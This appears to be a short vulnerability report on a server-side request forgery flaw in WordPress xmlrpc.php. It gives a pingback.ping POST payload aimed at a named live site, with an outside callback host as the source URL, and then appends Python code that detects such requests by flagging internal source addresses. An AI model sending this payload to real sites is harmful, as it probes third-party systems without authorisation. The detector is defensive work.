SSRF vulnerability in WordPress xmlrpc.php
xmlrpc.php is affected by an SSRF vulnerability.
Vulnerable URL: http://baijie.joowp.com/xmlrpc.php
Verification method:
POST http://baijie.joowp.com/xmlrpc.php

<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://qxotxt.s0x.cn/</string></value></param>
    <param><value><string>http://baijie.joowp.com//?p=1</string></value></param>
  </params>
</methodCall>
Match content:
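For defenders, the request shown above can be recognised at a proxy or in captured request bodies. The following is an added example, not part of the original report: it parses a direct pingback.ping call and flags a source URL that points at a non-public address. The function names, reason labels and sample hosts are constructed for illustration.

```python
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample body in the shape of the request on this page (placeholder hosts).
SAMPLE = b"""<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall><methodName>pingback.ping</methodName><params>
<param><value><string>http://10.0.0.5/</string></value></param>
<param><value><string>http://blog.example/?p=1</string></value></param>
</params></methodCall>"""

def internal_literal(host):
    """True if host is 'localhost' or an IP literal that is not publicly routable."""
    if host.lower() == "localhost":
        return True
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False  # a DNS name; resolving it is out of scope for this check

def inspect_xmlrpc(body: bytes) -> dict:
    """Classify an XML-RPC request body for pingback-based SSRF indicators."""
    result = {"pingback": False, "source": None, "target": None, "reasons": []}
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        result["reasons"].append("dtd-in-body")  # do not parse bodies that declare a DTD
        return result
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        result["reasons"].append("malformed-xml")
        return result
    if (root.findtext("methodName") or "").strip() != "pingback.ping":
        return result
    result.update(pingback=True, reasons=["pingback.ping"])
    # An XML-RPC <value> with no type element is a string by default.
    strings = [(v.findtext("string") or v.text or "").strip()
               for v in root.findall("params/param/value")]
    if len(strings) >= 2:
        result["source"], result["target"] = strings[0], strings[1]
        try:
            parts = urlsplit(strings[0])
        except ValueError:
            result["reasons"].append("unparsable-source")
            return result
        if parts.scheme not in ("http", "https"):
            result["reasons"].append("non-http-source")
        if parts.hostname and internal_literal(parts.hostname):
            result["reasons"].append("internal-source")
    return result
```

A result with `pingback` set is worth logging on its own when the site does not use pingbacks; `internal-source` covers only IP literals and `localhost`, so a DNS name that resolves to an internal address needs a resolver-side check.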